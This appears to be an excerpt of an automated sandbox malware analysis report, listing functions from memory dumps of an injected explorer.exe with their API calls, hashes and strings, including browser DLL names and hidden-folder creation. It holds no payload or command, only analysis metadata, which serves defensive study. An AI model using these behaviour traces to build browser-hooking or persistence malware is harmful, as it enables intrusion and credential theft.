                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B731C021A16B4791FF35AF51EC903783365BF45F94F580635DD2A86AA2DF7CC046A310
                                                                                                                                                                                                                        Function 0DFBA280 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFBAC00: RtlInitializeCriticalSection.NTDLL ref: 0DFBAC31
                                                                                                                                                                                                                          • Part of subcall function 0DFBAC00: RtlInitializeCriticalSection.NTDLL ref: 0DFBAC3E
                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32 ref: 0DFBA2F9
                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32 ref: 0DFBA34E
                                                                                                                                                                                                                        • malloc.MSVCRT ref: 0DFBA373
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0DFBA3CE
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DFBA3D7
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalHandleInitializeModuleSection$CloseFileNamefreemalloc
                                                                                                                                                                                                                        • String ID: .text$browser.dll$chrome.dll$msedge.dll$opera-browser.dll
                                                                                                                                                                                                                        • API String ID: 308684148-2401417439
                                                                                                                                                                                                                        • Opcode ID: c877b7ebf5a076277a0cb6aabd5b9a9ecb681da6889e265d7469df75222f0100
                                                                                                                                                                                                                        • Instruction ID: c886de4d0237ac99a18e8ea4145a7436aee10a7e92924a95c847769151f4cc7f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c877b7ebf5a076277a0cb6aabd5b9a9ecb681da6889e265d7469df75222f0100
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80519D72708B8295EA21DF5AE8403FA7365F788B94F88C126CE4A47724EFBDC645C750
                                                                                                                                                                                                                        Function 0E11A280 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0E11AC00: RtlInitializeCriticalSection.NTDLL ref: 0E11AC31
                                                                                                                                                                                                                          • Part of subcall function 0E11AC00: RtlInitializeCriticalSection.NTDLL ref: 0E11AC3E
                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32 ref: 0E11A2F9
                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32 ref: 0E11A34E
                                                                                                                                                                                                                        • malloc.MSVCRT ref: 0E11A373
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0E11A3CE
                                                                                                                                                                                                                        • free.MSVCRT ref: 0E11A3D7
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalHandleInitializeModuleSection$CloseFileNamefreemalloc
                                                                                                                                                                                                                        • String ID: .text$browser.dll$chrome.dll$msedge.dll$opera-browser.dll
                                                                                                                                                                                                                        • API String ID: 308684148-2401417439
                                                                                                                                                                                                                        • Opcode ID: 9b68e0dd4b4905f2a987690e05f0d669eb600becd0b96a1415015b4546e5f171
                                                                                                                                                                                                                        • Instruction ID: 325a199ce5c32a09385071d5bc3543741eb2b2aa28bbf5fd4fcd629f667f7c53
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b68e0dd4b4905f2a987690e05f0d669eb600becd0b96a1415015b4546e5f171
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B451947131ABC185EA24DF22E8503DA67A5FB89B80FC84862DE4A57754EF3CCA85C741
                                                                                                                                                                                                                        Function 0FF5A280 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0FF5AC00: RtlInitializeCriticalSection.NTDLL ref: 0FF5AC31
                                                                                                                                                                                                                          • Part of subcall function 0FF5AC00: RtlInitializeCriticalSection.NTDLL ref: 0FF5AC3E
                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32 ref: 0FF5A2F9
                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32 ref: 0FF5A34E
                                                                                                                                                                                                                        • malloc.MSVCRT ref: 0FF5A373
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0FF5A3CE
                                                                                                                                                                                                                        • free.MSVCRT ref: 0FF5A3D7
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalHandleInitializeModuleSection$CloseFileNamefreemalloc
                                                                                                                                                                                                                        • String ID: .text$browser.dll$chrome.dll$msedge.dll$opera-browser.dll
                                                                                                                                                                                                                        • API String ID: 308684148-2401417439
                                                                                                                                                                                                                        • Opcode ID: 9b68e0dd4b4905f2a987690e05f0d669eb600becd0b96a1415015b4546e5f171
                                                                                                                                                                                                                        • Instruction ID: c3c3e517f5b08758bfc9bad7c4bf873a8f568d4d95d997e3a88d44a136ece2e0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b68e0dd4b4905f2a987690e05f0d669eb600becd0b96a1415015b4546e5f171
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C511821608B8785EA31EF11A8507BAA7A4FF89FC4FC84236CE4A57A15EF3CD156D740
                                                                                                                                                                                                                        Function 0DFB07C0 Relevance: 17.6, APIs: 14, Instructions: 137stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$lstrlen$freemallocmemsetwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1433255627-0
                                                                                                                                                                                                                        • Opcode ID: c99e226cb075efdfdbf0a52de36c47a1dd05dd7b8a07826977679618aaecfa00
                                                                                                                                                                                                                        • Instruction ID: 120913920bb114c48595ab5eaa94a02bc72dddc73ad0c1bfb326cde76390740b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c99e226cb075efdfdbf0a52de36c47a1dd05dd7b8a07826977679618aaecfa00
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88517D76704B9186EB24DF5AE8443AA73A1FB89BD4F04D12ACE4E43B68DF7CC5058B10
                                                                                                                                                                                                                        Function 0E1107C0 Relevance: 17.6, APIs: 14, Instructions: 137stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$lstrlen$freemallocmemsetwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1433255627-0
                                                                                                                                                                                                                        • Opcode ID: 04027b89da6b9f4f311e5d19a3a4145fe0765d14d29bd0568ddead53d1ed5392
                                                                                                                                                                                                                        • Instruction ID: 9cb457e3888555b070ef4b6ff254271fc20fd50b998b618cebf139978fc21324
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04027b89da6b9f4f311e5d19a3a4145fe0765d14d29bd0568ddead53d1ed5392
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57517CB6B05B8086EB24DF16E95439A73A1FB8CBC5F055529CE8E53B58DF7CC9848B00
                                                                                                                                                                                                                        Function 0FF507C0 Relevance: 17.6, APIs: 14, Instructions: 137stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$lstrlen$freemallocmemsetwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1433255627-0
                                                                                                                                                                                                                        • Opcode ID: 04027b89da6b9f4f311e5d19a3a4145fe0765d14d29bd0568ddead53d1ed5392
                                                                                                                                                                                                                        • Instruction ID: a601172e27527ad428b6c53f0f2d1fb07276bcbce387375e87c3accb09de8c8c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04027b89da6b9f4f311e5d19a3a4145fe0765d14d29bd0568ddead53d1ed5392
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6515B76704B4286EB24DF26E8443AA73A1FB88FC4F445139CE4A43B59DF3CC54A8B04
                                                                                                                                                                                                                        Function 0E10A1B0 Relevance: 16.6, APIs: 11, Instructions: 112memoryfileCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3250796435-0
                                                                                                                                                                                                                        • Opcode ID: 4999e7ccdb6d133b0e9522f9030a530e963fb9a5ffeb94da4667c25ff20d675b
                                                                                                                                                                                                                        • Instruction ID: 25e3287869434a33a245a74a34338819e3eaad77a78f42365ccb7ca682642917
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4999e7ccdb6d133b0e9522f9030a530e963fb9a5ffeb94da4667c25ff20d675b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A418932315B8087EB508F26E85476E77A5FB88BD0F114625DE9E53B94EF38C585CB10
                                                                                                                                                                                                                        Function 0FF4A1B0 Relevance: 16.6, APIs: 11, Instructions: 112memoryfileCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3250796435-0
                                                                                                                                                                                                                        • Opcode ID: 4999e7ccdb6d133b0e9522f9030a530e963fb9a5ffeb94da4667c25ff20d675b
                                                                                                                                                                                                                        • Instruction ID: 6113d5506b93936696a975d3792050fefaea5b42b9b739828b95e859a4d95998
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4999e7ccdb6d133b0e9522f9030a530e963fb9a5ffeb94da4667c25ff20d675b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E41C132709B4286DB609F26A84477ABBA4FF89B90F444239DE5E43B54EF3CE045D710
                                                                                                                                                                                                                        Function 0E109D80 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 53stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0E109C50: GetWindowsDirectoryW.KERNEL32 ref: 0E109CA3
                                                                                                                                                                                                                          • Part of subcall function 0E109C50: GetVolumeInformationW.KERNEL32 ref: 0E109CF2
                                                                                                                                                                                                                          • Part of subcall function 0E109C50: wsprintfW.USER32 ref: 0E109D54
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32 ref: 0E109DE5
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0E109DF5
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0E109E03
                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32 ref: 0E109E0E
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32 ref: 0E109E1C
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0E109E2C
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0E109E3A
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0E109E4A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: c2465feb47dfbf4e39e3fb636e60b490fb9b3a01f4a1802c0286285fc0bd52c3
                                                                                                                                                                                                                        • Instruction ID: 13fc967cfedad4a0eb10470a85911f64da278caf41eb8c55c88bb5896353ab4f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2465feb47dfbf4e39e3fb636e60b490fb9b3a01f4a1802c0286285fc0bd52c3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4221F332319B8186EB90DB21F85879D33E1B78DB84F412835DA8E97714EE38C659CB00
                                                                                                                                                                                                                        Function 0FF49D80 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 53stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0FF49C50: GetWindowsDirectoryW.KERNEL32 ref: 0FF49CA3
                                                                                                                                                                                                                          • Part of subcall function 0FF49C50: GetVolumeInformationW.KERNEL32 ref: 0FF49CF2
                                                                                                                                                                                                                          • Part of subcall function 0FF49C50: wsprintfW.USER32 ref: 0FF49D54
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32 ref: 0FF49DE5
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0FF49DF5
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0FF49E03
                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32 ref: 0FF49E0E
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32 ref: 0FF49E1C
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0FF49E2C
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0FF49E3A
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0FF49E4A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: c2465feb47dfbf4e39e3fb636e60b490fb9b3a01f4a1802c0286285fc0bd52c3
                                                                                                                                                                                                                        • Instruction ID: e7cb5e40a5fe073552d357e2122305104e2e8b8e835b3ca2fd97fdfbc9fe805d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2465feb47dfbf4e39e3fb636e60b490fb9b3a01f4a1802c0286285fc0bd52c3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7221E432319B4395EBA0EF21FC5876AB3A1BF89744F412035DA9E87B14EF38C1199704
                                                                                                                                                                                                                        Function 0E109E70 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 48stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0E109B30: GetWindowsDirectoryA.KERNEL32 ref: 0E109B7C
                                                                                                                                                                                                                          • Part of subcall function 0E109B30: GetVolumeInformationA.KERNEL32 ref: 0E109BC6
                                                                                                                                                                                                                          • Part of subcall function 0E109B30: wsprintfA.USER32 ref: 0E109C27
                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32 ref: 0E109EC3
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0E109ED3
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0E109EE1
                                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32 ref: 0E109EEC
                                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32 ref: 0E109EFA
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0E109F0A
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0E109F18
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0E109F28
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: 60a5b1947e9a1e6045203543321f9579d85a40846c9d1738233bd2d77a5d265c
                                                                                                                                                                                                                        • Instruction ID: c3c916c09b0505ac558ce52322eb5412aeedea5cb41f8b6b7c730188adef59f1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60a5b1947e9a1e6045203543321f9579d85a40846c9d1738233bd2d77a5d265c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6611F931215B8582EE44DB31F85479AB3A2FB8DB84F446825D98B57728DE7CC255CB00
                                                                                                                                                                                                                        Function 0FF49E70 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 48stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0FF49B30: GetWindowsDirectoryA.KERNEL32 ref: 0FF49B7C
                                                                                                                                                                                                                          • Part of subcall function 0FF49B30: GetVolumeInformationA.KERNEL32 ref: 0FF49BC6
                                                                                                                                                                                                                          • Part of subcall function 0FF49B30: wsprintfA.USER32 ref: 0FF49C27
                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32 ref: 0FF49EC3
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0FF49ED3
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0FF49EE1
                                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32 ref: 0FF49EEC
                                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32 ref: 0FF49EFA
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0FF49F0A
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0FF49F18
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0FF49F28
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: 60a5b1947e9a1e6045203543321f9579d85a40846c9d1738233bd2d77a5d265c
                                                                                                                                                                                                                        • Instruction ID: ff05d62d4830e850e269c2b12bdd233261a5fe358a77e3c7676de30ac87740b0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60a5b1947e9a1e6045203543321f9579d85a40846c9d1738233bd2d77a5d265c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6211E725219B4792EB64AF21FC5477AB3A1FF89B84F446035D98A47B28DF7CC119DB00
                                                                                                                                                                                                                        Function 0DFA9F50 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 123stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: isprint$strstr
                                                                                                                                                                                                                        • String ID: DELETE$GET$PATCH$POST$PUT
                                                                                                                                                                                                                        • API String ID: 1066184663-1590512397
                                                                                                                                                                                                                        • Opcode ID: 213566e0c594fa46ebec85404c69b5829d0866ebd49a4250a26f2a22a0e008b7
                                                                                                                                                                                                                        • Instruction ID: e2c6ca75b6be1302a74a50e0a4bb2c6cebf121c1326eb932ee981b32264a7f18
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 213566e0c594fa46ebec85404c69b5829d0866ebd49a4250a26f2a22a0e008b7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F41D467608B9485DB21CF29F5803BA77A5F785754F88D22ADE8A43758EB7CC049CB10
                                                                                                                                                                                                                        Function 0E109F50 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 123stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: isprint$strstr
                                                                                                                                                                                                                        • String ID: DELETE$GET$PATCH$POST$PUT
                                                                                                                                                                                                                        • API String ID: 1066184663-1590512397
                                                                                                                                                                                                                        • Opcode ID: 213566e0c594fa46ebec85404c69b5829d0866ebd49a4250a26f2a22a0e008b7
                                                                                                                                                                                                                        • Instruction ID: e1b65308d6c2dd7fae130b3e3ed7df2b19645a7de651f1a20177d18ab0b396d9
